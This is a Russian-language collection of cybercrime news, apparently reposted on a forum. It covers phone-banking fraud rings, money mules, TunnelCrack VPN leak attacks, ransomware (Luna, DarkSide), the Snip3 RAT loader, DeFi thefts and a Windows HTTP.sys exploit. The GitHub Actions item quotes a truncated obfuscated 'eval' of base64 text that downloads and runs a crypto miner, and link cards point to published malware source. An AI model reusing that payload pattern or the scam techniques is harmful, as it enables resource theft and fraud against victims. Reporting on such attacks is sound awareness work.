Как сообщает УВД Гомельского облисполкома, главбух на протяжении нескольких лет переводила различные суммы со счетов организации на свою банковскую карту и карты пособников. Перечисления в бухгалтерской программе маскировались как расчётные платежи. Кроме того, фигурантка выводила средства через банковские счета супруга и сына, которые никакого отношения к предприятию не имели.
Общая сумма ущерба превысила 115 тысяч рублей. Возбуждено уголовное дело за хищение путем злоупотребления служебными полномочиями в особо крупном размере.
Теперь ей светит до 12 лет топтания керамики и шведский стол.
Киберполицейские Днепропетровщины совместно со следователями областного главка под процессуальным руководством Днепропетровской областной прокуратуры пресекли деятельность организованной преступной группы, которая насчитывала восемь участников.
Организовал сделку 31-летний житель райцентра, который приобрел в даркнете базы данных клиентов банков и привлек к противоправной деятельности знакомых и родственников.
Как установили полицейские, сообщники обустроили колл-центр по месту жительства организатора и под видом сотрудников банков звонили гражданам. Базы данных клиентов банков аферисты приобрели в даркнете и выведировали конфиденциальную информацию, в частности, номера банковских карт, CVV-коды, СМС-пароли и тому подобное.
Также, во время разговора «операторы» убеждали граждан установить мобильное приложение для получения удаленного доступа к гаджетам жертв. После этого подозреваемые осуществляли несанкционированный вход в мобильное приложение онлайн-банкинга и выводили средства на банковские счета дропов. Присвоенные сбережения обналичивались в банкоматах Кривого Рога.
Следователи установили, что участники преступной группы присвоили более 4 миллионов гривен.
Полицейские при силовой поддержке спецподразделения КОРД провели восемь обысков по адресам регистрации и проживания фигурантов, а также в автомобиле организатора группы. Изъята компьютерная техника, 28 мобильных телефонов, 59 сим-карт, 55 сим-холдеров, 44 банковских карты, 25 тысяч гривен, 2500 долларов и 300 евро. В суд направлено ходатайство об аресте изъятой наличности.
Кроме того, обнаружены пакеты с веществом, похожим на наркотическое средство. Вещественные доказательства направлены для проведения судебной экспертизы.
Следователи объявили злоумышленникам подозрение по ч. 4 ст. 190 (Мошенничество) Уголовного кодекса Украины. Суд избрал организатору, соорганизатору и одной исполнительнице меры пресечения в виде содержания под стражей. Двум их сообщницам избраны меры пресечения в виде домашнего ареста.
Продолжаются следственные действия для установления возможных соучастников и полного круга потерпевших. Возможна дополнительная квалификация.
Популярные VPN-клиенты с 1996 года подвержены утечке пользовательского трафика.
Сегодня многие считают VPN надежным способом обеспечения приватности в интернете. Однако недавно обнаруженные уязвимости под названием « TunnelCrack », существующие с 1996 года, могут привести к утечке пользовательского трафика, краже информации и атакам на устройства.
Уязвимости приводят к двум атакам:
**Атака LocalNet
Идентификаторы уязвимостей:** CVE-2023-36672 и CVE-2023-35838
Атака эксплуатирует исключения в маршрутизации VPN, когда трафик, предназначенный для локальных сетевых адресов, обходит VPN-туннель. Атака начинается с того, что злоумышленник создает поддельную сеть, например, клонируя определённую Wi-Fi-точку и выдаёт неправильные сетевые настройки своим жертвам.
Это делается так, чтобы определенные публичные IP-адреса, которые интересуют злоумышленника, выглядели как часть локальной сети. В итоге трафик, направленный к IP-адресам, идет в обход VPN-туннеля, что позволяет атакующему мониторить или модифицировать данные.
**Атака ServerIP
Идентификаторы уязвимостей:** CVE-2023-36673 и CVE-2023-36671
Атака направлена на клиентов, которые обычно связываются с VPN-серверами через доменное имя. Злоумышленник контролирует DNS-сервер, к которому подключается клиент, и манипулирует ответами DNS, чтобы возвращать неверный IP-адрес для VPN-сервера. При этом неправильный IP-адрес совпадает с IP-адресами других ресурсов, которые интересуют злоумышленника. Когда жертва пытается подключиться к VPN, трафик направляется через вредоносный сервер.
Киберпреступник перенаправляет VPN-трафик на реальный VPN-сервер, чтобы поддерживать видимость нормального соединения. Однако параллельный незашифрованный трафик, направленный к злоумышленнику, может быть проанализирован или изменен.
По словам исследователей, все протестированные VPN-сервисы оказались уязвимыми на различных платформах, таких как Android, iOS, Linux, macOS и Windows. Информация подкрепляется реакцией некоторых производителей, которые уже начали исправлять уязвимости. Например, Cisco выпустила обновление для своего корпоративного VPN-клиента Anyconnect (также известного как Secure Mobility Client). Кроме того, ряд ведущих производителей потребительских VPN, включая Mozilla VPN и Cloudflare WARP, также заявили о внесении соответствующих исправлений.
Что касается уязвимости к атакам типа LocalNet, то число подверженных проблеме VPN-клиентов все еще неясно.
Особенностью разных операционных систем является различный уровень доступа приложений VPN к системным настройкам. Доступ привел к тому, что все VPN на iOS и macOS стали уязвимыми, а на Android недостатки затронули только 25% приложений. Интересно, что начиная с Android 12 атака становится невозможной.
Для macOS большинство VPN-клиентов подвержены атаке, а на Windows – около 60% всех VPN. Отметим, что встроенное в Windows стандартное VPN-приложение также уязвимо. На данный момент Microsoft ещё не анонсировала выпуск исправлений для проблемы.
Атаки показывают, насколько важно правильно настроить и обновлять VPN-системы, а также осознавать риски, связанные с публичными сетями и маршрутизаторами.

Hack ](https://thehackernews.com/2023/06/two-russian-nationals-charged- for.html)
The masterminds behind the epic Mt. Gox cryptocurrency heist of 2014 have been charged by the U.S. Department of Justice
 thehackernews.com
Тот случай, когда даже небольшая погрешность стоит компаниям драгоценной репутации.
В 2015 году сервис Google Photos столкнулся с громким скандалом: встроенный в платформу определитель лиц на основе машинного обучения пометил фотографии двух чернокожих людей как «гориллы». Компания извинилась и пообещала исправить ошибку. Однако, как было быстро замечено пользователями, в качестве решения проблемы сервис просто перестал определять обезьян на фотографиях в принципе. И спустя восемь лет проблема так и не решена: Google Photos по-прежнему не может найти ни одного изображения обезьян в коллекции фотографий.
Исследователи издания The New York Times решили провести небольшой эксперимент и сравнить аналогичные приложения и сервисы по хранению и распознаванию фотографий от других технологических гигантов: Apple, Amazon и Microsoft. Они собрали 44 фотографии с людьми, животными и предметами и попробовали найти их по запросам.
Оказалось, что Apple Photos тоже не способен распознать большинство приматов. Приложение нашло фото гориллы только тогда, когда на нем был текст с этим словом. Microsoft OneDrive вообще не выдал никаких результатов по животным. Amazon Photos показал результаты по всем запросам, но они были слишком широкими: например, поиск по слову «горилла» выдал вообще всех обезьян. Когда как собак большинство сервисов способно определять с точностью до породы.
Единственное животное из семейства приматов, которое Google и Apple смогли определить, — это лемур. Вряд ли алгоритм вообще сможет спутать лемура с человеком из-за специфической расцветки шерсти и вечно удивлённого взгляда, потому, вероятно, он и определяется корректно.
Почему же так происходит? Возможно, Google и Apple боятся повторить ошибку 2015 года и именно поэтому насовсем отключили функцию распознавания обезьян. В случае с Google Photos два бывших сотрудника компании рассказали, что проблема была в том, что в коллекции изображений для обучения системы было недостаточно фотографий чернокожих людей. В связи с чем, итоговая система не была знакома с тёмным цветом кожи и спутала его с гориллами.
Это не единственный случай, когда технологии обвиняли в предвзятости. Ещё были примеры с веб-камерами HP, которые не могли обнаружить некоторых людей с темной кожей, и с Apple Watch, которые якобы не точно определяли уровень кислорода в крови у «цветных» людей.
Однако вряд ли стоит искать расисткие мотивы в любых неточностях работы подобных технологий. Уж с чем, а с подобными рисками не захочет сталкиваться ни одна технологическая компания. Поэтому специально «подшучивать» таким образом над представителями негроидной расы у компаний нет ни желания, ни возможности.
Так или иначе, искусственный интеллект и технологии машинного обучения с годами лишь совершенствуется, и возможно, ещё через несколько лет вышеупомянутые системы научатся определять любые объекты, животных и в том числе обезьян со стопроцентной вероятностью. Но пока существует погрешность, ни Google, ни Apple, ни кто-либо ещё — явно не хотят брать на себя ответственность за неидеальную работу своих систем, чтобы избежать репутационных рисков. И это на текущий момент — самое правильное решение.
source: nytimes.com/2023/05/22/technology/ai-photo-labels-google-apple.html
__https://twitter.com/x/status/1570582547415068672
https://www.washingtonpost.com/technology/2022/09/15/uber-hack/
Which one of you did it? lol
Ресерчеры Лаборатории Касперского благодаря системе активного мониторинга Darknet Threat Intelligence расчехлили новую ransomware.
Новый штамм, получивший название Luna, может использоваться для шифрования устройств, работающих под управлением нескольких ОС, включая системы Windows, Linux и ESXi.
Обнаруженная исследователями через рекламу в даркнете, Luna адаптирована для русскоязычных операторов. При этом записка о выкупе, жестко запрограммированная внутри двоичного файла, содержит орфографические ошибки. Исходя из-за этого ресерчеры со средней степенью уверенности предполагают, что акторы говорят по-русски.
Как видно из рекламы, вредоносное ПО написано на Rust и все еще находится в стадии разработки, имея ограниченные возможности, основанные на доступных параметрах командной строки.
Судя по доступным параметрам командной строки, Luna довольно проста. Однако используемая им схема шифрования не так типична, так как включает x25519 и AES, комбинацию, которая не часто встречается в схемах вымогателей.
Образцы для Linux и ESXi Luna скомпилированы с использованием одного и того же исходного кода с некоторыми незначительными изменениями по сравнению с версией для Windows.
Как отмечают исследователи, кроссплатформенность ransomware позволяет переносить его на несколько платформ с очень небольшими изменениями в исходном коде, а также уклоняться от автоматизированного статического анализа кода.
Luna подтверждает тенденцию к кроссплатформенным программам-вымогателям: современные банды программ-вымогателей в значительной степени полагаются на такие языки, как Golang и Rust. Ярким примером являются BlackCat и Hive.
Поскольку Luna - недавно обнаруженная группа, данных о ее виктимологии пока мало, но в Лаборатории обещают проследить за активностью вымогателей.
• Source: https://securelist.com/luna-black-basta-ransomware/106950/
Очередной протокол DeFi подвергся взлому. На этот раз жертвой хакеров стал проект FinNexus, в результате чего были выпущены токены FNX на сумму $7.4 млн.
В сообщении в Twitter команда разработчиков FinNexus принесла извинения и попросила всех участников пулов протокола вывести токены. Также разработчики попросили пока не покупать токены FNX на криптовалютных биржах. При этом, судя по всему, смарт-контракты взломаны не были, а злоумышленник получил доступ к ключу администратора.
Хакер, либо инсайдер, изменил в смарт-контракте FinNexus владельца токена на другие адреса в сетях Эфириума и Binance Smart Chain. После этого он выпустил 323 млн токенов FNX ($6 млн) в сети Эфириума и 60 ($1.6 млн) млн FNX на BSC. Затем он начал переводить токены на различные адреса и продавать их.
После взлома курс токена FNX рухнул сразу на 91%. Если раньше токен торговался по $0.31, то теперь его можно купить по $0.033. Если разработчики не смогут заблокировать выпущенные токены, то курс FNX будет восстанавливаться крайне долго.
Похищены личные данные сотрудников, сведения о новых проектах и работе менеджмента.
Группировка хакеров DarkSide объявила 14 мая, что украла секретные данные у французского отделения японской электротехнической корпорации Toshiba, сообщил телеканал NHK со ссылкой на японскую компанию, которая занимается кибербезопасностью.
Заявление о нападении было опубликовано на сайте, который используют хакеры. В нем киберпреступники сообщили, что похитили у Toshiba 740 ГБ информации, в которой содержатся сведения о работе менеджмента и новых бизнес-проектах компании, а также личные данные сотрудников. В настоящее время японская корпорация проводит собственное расследование произошедшего инцидента.
Стоит отметить, что корпорация Toshiba, занятая в том числе в оборонном производстве и выпуске оборудования для атомных станций, в последнее время уже становилась объектом компьютерных атак
Как ранее сообщалось, на прошлой неделе операторы вымогательского ПО DarkSide совершили кибератаку на крупнейшую компанию-оператора трубопровода для нефтепродуктов в США Colonial Pipeline.
Вымогательское ПО DarkSide зашифровало данные в сетях компании и потребовало выкуп, в результате чего ей пришлось отключить некоторые системы и остановить все операции, связанные с трубопроводом. В результате на многих автозаправочных станциях западного побережья США закончился бензин.
Власти США обвинили в атаке правительство РФ, но сама группировка DarkSide отрицает любую причастность к какому-либо правительству.
Загрузчик Snip3 используется для установки Revenge RAT, AsyncRAT, Agent Tesla и NetWire RAT на скомпрометированных системах.
Специалисты компании Microsoft предупредили о текущей вредоносной кампании целенаправленного фишинга, нацеленной на аэрокосмические и туристические организации. Преступники используют ряд троянов для удаленного доступа, установленных с помощью нового скрытного загрузчика вредоносных программ.
Фишинговые электронные письма злоумышленников отправляются якобы от имени легитимных организаций и замаскированы под документы в формате PDF, содержащие тематическую информацию. Встроенные в фишинговые сообщения ссылки загружают файлы VB Script, выполняющие PowerShell-скрипт. Последний, в свою очередь, выполняет окончательные полезные данные RAT с использованием Process Hollowing.
После установки вредоносное ПО способно красть учетные данные, делать снимки экрана, похищать данные web-камеры, браузера и буфера обмена, информацию о системе и сети, а также передавать данные через порт 587 SMTP.
Загрузчик, получивший названный Snip3, используется для установки полезных нагрузок Revenge RAT, AsyncRAT, Agent Tesla и NetWire RAT на скомпрометированных системах.
Snip3 также имеет возможность идентифицировать песочницу и виртуальные среды и таким образом избегать обнаружения со стороны антивирусных решений. Загрузчик вредоносных программ также использует дополнительные методы для избегания обнаружения, включая:
Индикаторы компрометации, связанные с текущей кампанией, включая хэши образцов вредоносных программ и домены C&C-серверов RAT, можно найти в [здесь](https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly- evasive-rat-loader) .
GitHub [расследует](https://therecord.media/github-investigating-crypto- mining-campaign-abusing-its-server-infrastructure) серию атак, в ходе которых злоумышленникам удалось организовать майнинг криптовалюты в облачной инфраструктуре GitHub, используя для запуска своего кода механизм GitHub Actions. Первые попытки использования GitHub Actions для майнинга датированы ноябрём прошлого года.
GitHub Actions даёт возможность разработчикам кода прикреплять обработчики для автоматизации различных операций в GitHub. Например, при помощи GitHub Actions можно выполнить определённые проверки и тесты при совершении коммитов или автоматизировать обработку новых Issues. Для запуска майнинга атакующие создают форк репозитория, в котором используется GitHub Actions, добавляют в свою копию новый GitHub Actions и отправляют в оригинальный репозиторий pull- запрос, предлагающий замену существующих обработчиков GitHub Actions на новый обработчик ".github/workflows/ci.yml".
Вредоносный pull-запрос [порождает](https://github.com/thibaultduponchelle/messy-ci- workflows/actions/runs/549053847) многократные попытки запуска заданного атакующим обработчика GitHub Actions, который после 72 часов прерывается из-за таймаута, завершается сбоем и затем запускается вновь. Для атаки злоумышленнику достаточно лишь создать pull-запрос - обработчик запускается автоматически без какого-либо подтверждения или участия со стороны сопровождающих оригинального репозитория, которые лишь могут заметить подозрительную активность и остановить уже запущенные задания GitHub Actions.
В добавляемом атакующими обработчике ci.yml в параметре "run" присутствует обфусицированный код (eval "$(echo 'YXB0IHVwZGF0ZSAt...' | base64 -d"), который при выполнении пытается загрузить и запустить программу для майнинга. В первых вариантах атаки из хразны репозиториев на GitHub и GitLab загружалась программа, названная npm.exe и собранная в форме исполняемого ELF-файла для Alpine Linux (используется в образах Docker). В более новых формах атаки загружается код типового майнера XMRig из официального репозитория проекта, который затем собирается с подстановкой адреса кошелька и серверов для отправки данных.
Эксперт Positive Technologies Егор Димитренко обнаружил уязвимость высокого уровня опасности в средстве репликации данных VMware vSphere Replication. Данное решение дает возможность создавать резервные копии виртуальных машин и запускать их в случае сбоя основной виртуальной машины.
Найденная ошибка позволяла злоумышленникам, имеющим доступ к веб-интерфейсу администратора VMware vSphere Replication, выполнять на сервере произвольный код с максимальными привилегиями и начать продвижение внутри сети для захвата контроля над корпоративной инфраструктурой.
Проблема получила идентификатор CVE-2021-21976 и оценивается на 7,2 баллов из 10 по шкале CVSS v3.
«Уязвимости, позволяющие выполнять такого рода атаки (Сommand Injection), довольно часто можно встретить в продуктах для администрирования, — объясняет Егор Димитренко. — Обычно к таким ошибкам приводит недостаточная проверка пользовательских входных данных, которые впоследствии попадают в контекст вызова системных команд. Механизмы предотвращения подобных атак, как правило, встроены в инструменты разработчиков, защищая от возможности допустить ошибку при написании кода. Тем не менее по прежнему встречаются аномалии в коде, возникшие, например, при поспешном внедрении новой функциональности или в результате исправления уже существующей проблемы в рамках hotfix-исправлений. Для эксплуатации найденной уязвимости в продукте VMware злоумышленнику требуются учетные данные, которые могут быть получены вследствие использования слабых паролей или с помощью социотехнических атак».
Click to expand...
Для устранения уязвимости эксперты советуют руководствоваться рекомендациями из официального уведомления компании VMware.
Источник: xakep.ru/2021/02/20/vsphere-replication-bug/
Сотрудники ГУУР МВД России совместно с коллегами из Москвы пресекли противоправную деятельность семи жителей разных регионов России. Они подозреваются в хищениях денежных средств, совершенных в составе преступного сообщества.
«Предварительно установлено, что злоумышленники обзванивали пожилых граждан и представлялись работниками социальных служб. Они сообщали о необходимости встать на очередь для перерасчета пенсионных выплат. Для этого требовали назвать код из поступившего на мобильный телефон сообщения. В результате аферисты получали доступ к банковскому приложению потерпевших и переводили денежные средства на подконтрольные счета. Ущерб составил свыше 43,5 млн рублей», – сообщила официальный представитель МВД России Ирина Волк.
В результате оперативно-розыскных мероприятий сотрудники полиции задержали подозреваемых на территории Ростовской области и Краснодарского края. В ходе обысков у них обнаружены и изъяты банковские и сим-карты, смартфоны, документы и другие предметы, имеющие доказательственное значение.
«Следователем УВД по ЮВАО ГУ МВД России по г. Москве возбуждено более 60 уголовных дел по признакам преступления, предусмотренного частью 4 статьи 158 УК РФ, которые соединены в одно производство.
Кроме того, задержанным предъявлено обвинение в преступлении, предусмотренном статьей 210 УК РФ. В отношении одного из фигурантов избрана мера пресечения в виде домашнего ареста, остальные заключены под стражу», – отметила Ирина Волк.
• Video: https://rutube.ru/video/e452141584672ab63550942d1f35da95/
Житель Самарской области признан виновным в создании, использовании и распространении вредоносных компьютерных программ (ч.2 ст.273 УК РФ). Приговор вынес Кинельский районный суд региона. Об этом сообщает источник «Ъ-Волга» в правоохранительных органах.
«Фигурант признан виновным в инкриминируемом ему преступлении и приговорен к наказанию в виде одного года и шести месяцев ограничения свободы»,— говорится в сообщении.
Предполагаемый злоумышленник был установлен во время оперативно-розыскных мероприятий УФСБ РФ по Самарской области. Силовики выяснили, что он причастен к созданию, использованию и распространению вредоносного программного обеспечения. Оно применялось для нейтрализации антивирусных программ.
Для этого житель региона создал «криптосервис», установило следствия. С помощью него фигурант дела оказывал услуги по «обходу» антивирусной защиты. Это позволяло третьим лицам получить незаконный доступ к персональным данным.
За противоправную деятельность разработчик незаконного ПО системно получал денежное вознаграждение. По указанным фактам было возбуждено уголовное дело.
В Латвии раскрыта крупнейшая сеть по легализации украденных денег - «денежных
мулов». Вчера специализированная прокуратура по делам организованной
преступности и другим преступлениям сообщила: к ответственности привлечена
группа из 14 человек, в том числе гражданин Германии. Всего же в деятельность
"прачечной" было вовлечено более 90 человек в возрасте 16-20 лет, на счета
которых поступали похищенные деньги. Многие из них — несовершеннолетние
подростки.
Как считает следствие, преступная группировка "отмыла" в Латвии более
полумиллиона - 555 600 евро, украденных у жителей Германии.
В банке заметили странные переводы
Уголовный процесс по подозрению в отмывании денег в крупных размерах был начат два с половиной года назад. Тогда сотрудники одного из латвийских банков заметили регулярные и подозрительные поступления из Германии на счета своих клиентов.
Судя по всему, многие кражи происходили так же, как в Латвии — когда людям звонят телефонные мошенники и представляются "сотрудниками банка". В ходе разговора они получают доступ к банковским данным "клиентов" и крадут деньги со счёта. Потом эти деньги с помощью моментальных платежей переводились на латвийские счета, - сообщил журналистам представитель госполиции Руслан Григс.
В этом и заключалась работа "денежных мулов", которые получали платежи ZIB на свои банковские счета в основном от граждан Германии. Средства, поступившие на их счета, сразу же выводились наличными, в основном в полночь.
Потерпевшие, обнаружив, что их счета опустошены, обычно пытались на следующий день отменить исходящие денежные операции, но учитывая, что организаторы преступной группы обеспечивали немедленное снятие этих средств со счета «денежного мула», лишь небольшому проценту жертв удалось перехватить и вернуть выведенные средства.
Проведя анализ данных, был сделан вывод о том, что в течение одного месяца было совершено около 30 таких преступлений, и было подсчитано, что преступная группа действует в Латвии как минимум с сентября 2019 года.
Сколько "мулы" получали
Увод денег происходил организованно, у каждого участника преступной группировки была своя роль, — сообщает госполиция.
За одно перечисление молодые люди получали от 100 до 250 евро.
«Денежных мулов» преступники искали и вербовали "для подработки" в интернете. Привлекали в том числе учащихся - школьников, студентов.
Обычно предложения заработать лёгкие деньги распространяются в социальных сетях, в приложениях для общения.
"Мул" передает третьему лицу свой банковский счет. Если такового нет - специально открывает новый. После перечисления "мул" должен передать деньги третьему лицу, получив за это вознаграждение. (Более подробно об этой работе - см. в главе "Под какие статьи обычно попадают "мулы").
Как указывает полиция, 13 членов организованной преступной группы, которые вербовали «денежных мулов», были задержаны ещё в апреле 2020 года.
Лидера преступной группировки, проживавшего в Германии, задержали в мае этого года на основании европейского ордера на арест.
Недавно немецкая сторона выдала задержанного для уголовного преследования в Латвии. Ответственность каждого участника группировки, в том числе и «денежных мулов», в рамках отдельных уголовных дел оценит суд.
Полиция: "мулам" перекроют собственные счета
Учитывая сколько молодых людей, согласились поучаствовать в отмыве денег, государственная полиция на нынешней неделе выступила с очередным предупреждением: подобные действия грозит уголовная ответственность со всеми вытекающими отсюда последствиями.
Одна из сопутствующих проблем: возникнут трудностях в дальнейшей повседневной жизни, поскольку банки закрывают за "отмывы" счета и доступ к интернет-банку.
Это означает, что у молодого человека не будет банковского счета, на который ему будет перечисляться заработная плата, а, соответственно, оно не сможет совершать безналичные платежи, оплачивать покупки картой или совершать покупки в интернет-магазинах. Также им будут ограничен доступ к различным интернет- услугам (везде, где происхождит авторизация через банк), в том числе в государственных учреждениях.
Под какие статьи обычно попадают "мулы"
В чем именно заключается "криминал" в работе мулов? Государственная полиция указывает:
если лицо соглашается на предложение одолжить кому-либо свою банковскую карту на один или несколько дней, за это предусмотрена уголовная ответственность по признакам уголовного правонарушения (распространение сведений, делающих возможным неправомерное использование платежного средства), предусмотренных частью первой статьи 1931 Уголовного закона;
в случае предоставления лицом банку заведомо ложных сведений, за это предусмотрена уголовная ответственность по составу уголовного правонарушения, предусмотренного частью первой статьи 1951 Уголовного закона (непредоставление сведений либо предоставление заведомо ложных сведений о поступлении денежных средств на счет);
если лица соглашаются на предложение получить на свой банковский счет обманным путем денежные средства и перевести их на другой банковский счет за вознаграждение либо снять их наличными в банкомате и вернуть с вознаграждением или без вознаграждения, за это предусмотрена уголовная ответственность в соответствии с уголовное правонарушение, предусмотренное частью второй статьи 195 Уголовного закона (преступная легализация финансовых средств группой лиц по предварительному сговору);
если лица соглашаются на предложение разыскивать и привлекать других «денежных мулов», снимать деньги с иностранных банковских карт в банкоматах, передавать наличные деньги другим лицам, выдавать платежные карты «денежным мулам» после их использования, за это предусмотрена уголовная ответственность согласно части третьей ст. 195 УЗ (легализация финансовых средств, полученных преступным путем, в составе организованной группы).
Латвийские "мулы" обобрали и американцев
Как выяснилось, некий латвиец поучаствовал в отмыве денег международной группы мошенников, которая активно "работала" с международными платформами Craigslist и eBay.
Согласно документам американского суда, преступная группа выманила у жителей США более 10 миллионов долларов (около 9,5 миллиона евро)
Участники организованной группы размещали объявления о торговле автомобилями, строительным оборудованием, сельскохозяйственной техникой и лодками, однако на самом деле ничего из упомянутого у них не было.
Попросту кидали, получив деньги.
11 апреля сотрудники Госполиции Латвии при выполнении запроса об экстрадиции, который был получен от США, задержали гражданина Латвии в связи с участием в международной мошеннической схеме и легализацией преступно нажитых средств. И суд решил положительно вопрос о его выдаче в США.
В ходе расследования выяснилось, что 29-летний латвиец участвовал в схеме в качестве надзирателя за "денежными мулами".
Создавший пул ликвидности пользователь Uniswap за несколько секунд потерял более $700 000 после наплыва MEV-ботов, который, вероятно, произошел из-за ошибки в настройке. Об этом свидетельствуют ончейн- данные.
Судя по всему, владелец пула перепутал значения и установил цену в $1 для токена CRV (на момент написания торгуется по $0,53).
После добавления ликвидности в виде 45 «обернутых» биткоинов (wBTC) на сумму около $1,56 млн арбитражные боты почти моментально выкупили монеты. Взамен пользователь получил лишь 1,56 млн CRV, которые стоили примерно $850 000.
MEV Bots instantly rushed the pool to swap CRV for valuable WBTC — with the first bot making off with $1.36M in WBTC for only $730K in CRV.
But the bot only netted ~$260, paying $527K of ETH to the validator just to make this transaction.
Tough luck! pic.twitter.com/3JbVwhwYoj
— Arkham (@ArkhamIntel) November 4, 2023__https://twitter.com/x/status/1720798847763394848
Click to expand...
«MEV-боты мгновенно бросились в пул, чтобы обменять CRV на ценные wBTC: первый сбежал с $1,36 млн в wBTC, обменяв их всего за $730 000 в CRV. Но бот заработал только около $260, поскольку заплатил валидатору $527 000 в ETH. Везет, как утопленнику!», — подчеркнули аналитики Arkham.
Подобные инциденты в последнее время не редкость. 11 октября неизвестный пользователь обменял $131 350 в потерявшем привязку стейблкоине USDR на менее чем 0,0001 USDC.
Напомним, в тот же день другой MEV-бот на BNB Chain заработал $1,575 млн благодаря атаке стоимостью всего $4,16.
В Виннице правоохранители разоблачили мошенника, который создавал и рассылал фишинговые ссылки под видом оказания помощи якобы от международных организаций. Таким образом он получал доступ к счетам граждан и в дальнейшем присваивал их деньги. Фигуранту сообщено о подозрении.
Противоправную деятельность 19-летнего винничанина разоблачили следователи Отдела полиции № 2 Винницкого райуправления полиции совместно с сотрудниками управления противодействия киберпреступлениям Винницкой области и работниками служб безопасности банка.
Злоумышленник рассылал фишинговые ссылки через мессенджеры под предлогом оказания помощи от различных международных организаций: Красный крест, ООН, UNICEF и других организаций. Интерфейс мошеннического сайта был подобен официальному ресурсу и сайту банковского учреждения.
Когда люди переходили по полученной ссылке, злоумышленник получал данные банковских карточек граждан и входил в учетные записи онлайн-банкинга. В дальнейшем фигурант заменял финансовые номера телефонов на подконтрольные.
Со счетов потерпевших злоумышленник рассчитывался за услуги в интернет ресурсах, а также снимал наличные.
Общая сумма ущерба, нанесенная потерпевшим, составляет более 100 000 гривен.
По месту жительства фигуранта сотрудники полиции провели обыски. Изъяты мобильные телефоны, компьютерная техника, банковские карты и SIM-карты, использовавшиеся в противоправной деятельности.
26 мая следователи по процессуальному руководству Винницкой окружной прокуратуры объявили злоумышленнику подозрение по ч. 3 ст. 190 (мошенничество), ч. 2 ст. 200 (Незаконные действия с документами на перевод, платежными карточками и другими средствами доступа к банковским счетам, электронными деньгами, оборудованием для их изготовления) и ч. 5 ст. 361 (Несанкционированное вмешательство в работу информационных (автоматизированных), электронных коммуникационных, информационно- коммуникационных систем, электронных коммуникационных сетей) Уголовного кодекса Украины.
За содеянное ему грозит до 15 лет лишения свободы.

](https://cybersecurity.att.com/blogs/labs-research/botenago-strike-again- malware-source-code-uploaded-to-github?&web_view=true)
Executive summary In November 2021, AT&T Alien Labs™ first published research on our discovery of new malware written in the open-source programming language Golang. The team named this malware “BotenaGo.” (Read previous article here.) In this article, Alien Labs is updating that research with...
 cybersecurity.att.com
Egida/kek ](https://github.com/Egida/kek/blob/19991ef983f838287aa9362b78b4ed8da0929184/loader_multi.go)
Contribute to Egida/kek development by creating an account on GitHub.
github.com
Неизвестный вывел с биткоин-биржи HitBTC 40 млн токенов DVPN из-за ее ошибки, утверждает эмитент монет Sentinel Network. Проект разрабатывает P2P-рынок для децентрализованных приложений и ресурсов.
По мнению разработчиков проекта, кража стала возможной, поскольку биржа раскрыла мнемоническую фразу, которая используется для восстановления доступа к криптокошельку.
«Это полностью вне нашего контроля, HitBTC задержала распределение средств среди пользователей и скомпрометировала собственную мнемоническую фразу», — написала команда Sentinel Network.
В проекте выразили надежду, что биржа возместит пользователям потери.
«Мы хотели бы заверить пользователей, что ваши собственные DVPN безопасны. Слабое звено — HitBTC, которая сообщила нам о взломе через час после него», — добавила команда.
HitBTC заявила, что причиной инцидента стала уязвимость на стороне Sentinel Network:
«К сожалению, мы видим, что Sentinel пытается снять с себя ответственность за свои технологические недостатки и обмануть всех».
Биржа призвала «не вводить в заблуждение людей», поскольку мнемоническая фраза была создана для процедуры свопа токенов в кошельке проекта, а также привела несколько примеров кражи DVPN у пользователей. Во всех случаях это происходило из-за публикации мнемоники в поле примечаний к транзакции.
Согласно данным Mintscan.io, фраза опубликована в транзакции на 1 DVPN адреса самому себе. Предположительно, персонал HitBTC тестировал перевод средств перед свопом.
Сразу после инцидента цена DVPN обвалилась более чем на 18% — с $0,0259 до $0,0212. На момент написания токен торгуется около отметки $0,0253 (CoinGecko).
В Сети появился код демонстрационного эксплойта (Proof-of-concept, PoC), использующего червеобразную критическую уязвимость в последних версиях операционных систем Windows 10 и Windows Server. Поскольку патчи вышли с майским набором обновлений, пользователям рекомендуется не игнорировать их установку.
Сама уязвимость отслеживается под идентификатором CVE-2021-31166 и скрывается в системном драйвере HTTP.sys, который используется набором служб Windows Internet Information Services (IIS) для обработки HTTP-запросов.
Как отметили эксперты, брешь затрагивает Windows 10 версии 2004 и Windows Server 2004. Если злоумышленник завладеет эксплойтом, ему удастся отправить специально созданные вредоносные пакеты целевым серверам.
Представители Microsoft подчеркнули, что «в большинстве случаев» атакующие могут удалённо выполнить произвольный код, для чего не потребуется даже проходить процесс аутентификации. Именно поэтому техногигант [советует](https://msrc.microsoft.com/update- guide/vulnerability/CVE-2021-31166#faq) пропатчить все затронутые серверы.
Код PoC-эксплойта опубликовал исследователь в области кибербезопасности Аксель Суше. В этом случае Proof-of- concept задействует уязвимость вида use-after-free в HTTP.sys, которая в результате приводит к DoS и даже BSOD.
«Сам баг прячется в функции http!UlpParseContentCoding», — объясняет сам Суше.
В Твиттере специалист опубликовал GIF- анимацию, демонстрирующую эксплуатацию вышеописанной уязвимости.
Злоумышленник вывел из протокола децентрализованного финансирования xToken активы стоимость около $25 млн.
Our initial report on today’s exploit. More details in the coming days. https://t.co/ZadHCUTqEK
— xToken (@xtokenmarket) May 12, 2021Click to expand...
По словам разработчиков проекта, атака произошла 12 мая в 17:44 по московскому времени. Специалисты заметили «расхождения в цене и предложении» примерно через десять минут после ее начала и приостановили работу смарт-контрактов.
Неизвестный немедленно опустошил пулы ликвидности xBNTa и xSNXa. Токены BNT и SNX остались в контрактах xToken. Хакер извлек 416 ETH из контракта xSNX, поскольку он хранит Ethereum в рамках стратегии хеджирования долга.
Пулы ликвидности Bancor и Balancer потеряли активы стоимостью около $25 млн.
Злоумышленник взял мгновенный займ в размере 61 800 ETH, а затем применил два эксплойта:
• неизвестный использовал криптовалюту для манипуляций с оракулом Kyber Network, предоставляющим блокчейну данные о цене SNX. Ему удалось выпустить большое количество синтетических токенов, которые затем были конвертированы в ETH и SNX;
• поскольку xBNT — «обернутый» токен, для его выпуска необходимо внести залог именно в BNT. Однако смарт-контракт xToken не проверял эту зависимость. Благодаря уязвимости хакер использовал более дешевые токены SPD.
По мнению аналитика TheBlock Игоря Игамбердиева, факт одновременного использования двух уязвимостей и скорость атаки указывают на возможное участие людей, близких к разработке проекта.
Another DeFi protocol xToken was exploited today and almost $25 million was stolen.
The attacker was smart enough (or close enough to this project) to use two different exploits for two projects’ tokens. https://t.co/cCmOu1hj9g
— Igor Igamberdiev (@FrankResearcher) May 12, 2021Click to expand...
